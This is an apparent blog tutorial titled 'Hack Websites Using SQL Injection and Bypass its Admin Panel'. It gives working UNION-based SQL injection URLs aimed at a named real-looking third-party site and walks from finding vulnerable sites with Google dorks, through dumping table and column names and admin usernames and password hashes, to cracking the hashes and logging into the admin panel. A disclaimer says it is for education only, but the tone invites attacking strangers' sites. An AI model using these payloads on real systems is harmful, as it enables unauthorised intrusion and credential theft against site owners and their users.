◆Hack Websites Using SQL Injection and Bypass its Admin Panel!

◆No Tools Needed except your Web Browser

◆Hello there , If you are wondering How to Hack Websites ,then this Tutorial Is for you•

◆You might already learnt about SQL injection from various  blogs , so here im directly Discribing the tutorial more understanding way.

◆Firstly we have to find a SQL injection Vulnerable Website.
◆You will Find Thousands Of websites From Google if you use Google Dorks.

◆Here I have Found a sql injection vulnerable Website.


◆We have to Find whether this website is Vulnerable to SQL injection or Not

◆On your web browser type
And execute (execute means click on Go)

If you see

◆You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

◆Then the website is Vulnerable to SQL injection and that site can be hacked , if not the leave that site and choose another

◆We have found that the above site is vulnerable to SQL injection.

◆Now we have to find Columns in its database.
◆Again type

site.com/page.php?id=-2 order by 10–

◆If you see Unknown columns

◆Then decrease the number to lower unless the page loads without any error
http://musculoskeletalsociety.in/page.php?id=-2 order by 10–

◆Error Unknown Columns

◆Then replace 10 with 9 , 8, 7, 6 ,5 ,4..

◆Unless the page loads perfect

◆Here  the page loads fine
http://musculoskeletalsociety.in/page.php?id=-2 order by 5–

◆That means it have only 5 columns in its Database

◆Now we have to find its Vulnerable Column

◆So here is The sql Command.

◆Now type In your web browser
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,2,3,4,5–

◆You will see Numbers Between 1-5 on the page

◆I have found 2 on the page so 2nd column is Vulnerable

◆Now we have to Find its Database version and username.

◆So type
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,@@version,3,4,5–

◆And click on go You will find Database version

◆I have found 5.0 up

◆Note you can replace @@version to version() for database version and
@@user of user() for Database user

◆SQL  injection will be easy if the database version is 5.0 up
◆If Database version is below 5.0
◆Then we have to guess everything soon We will Discuss more about it

◆Now we have found its Database Version
◆Now type http://musculoskeletalsociety.in/page.php?id=-2 union+select+ 1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()–

◆You will see it’s Tables

◆Now we want its Admin Table Details
For that type this command

http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()–

◆Now you will see its Username ,Password, email etc.. Columns

◆Now we only want Username and password•
◆For that apply this command•
 http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(user_id,0x3a,password),3,4,5+from admin–

◆Here admin is the table name which we got from previous command
◆Don’t be confused you may find admin_table or tbl_admin or administrator etc on other websites

◆Here 0x3a is the hexadecimal value of :
◆By executing the above command you will see its username and password
◆Note the password may be Encrypted by md5 or other encryptions so we have to decrypt it

◆Here is a website to decrypt the hash
Go hashkiller.co.uk  and decrypt there

◆After decryption
◆Search for the website’s admin panel
◆You can find it by

◆Etc finally find admin panel some how and enter the username and Password
And Enjoy..

◆You can do SQL Injection with Some tools to save your time•
◆Here I m presented some  Automated SQL injection Tools For Android

Note: This Tutorial is Only For Education Purpose We are Not Responsible for any Mistake or Misuse Done by you..

If you have any questions please feel free to ask us.



Please enter your comment!
Please enter your name here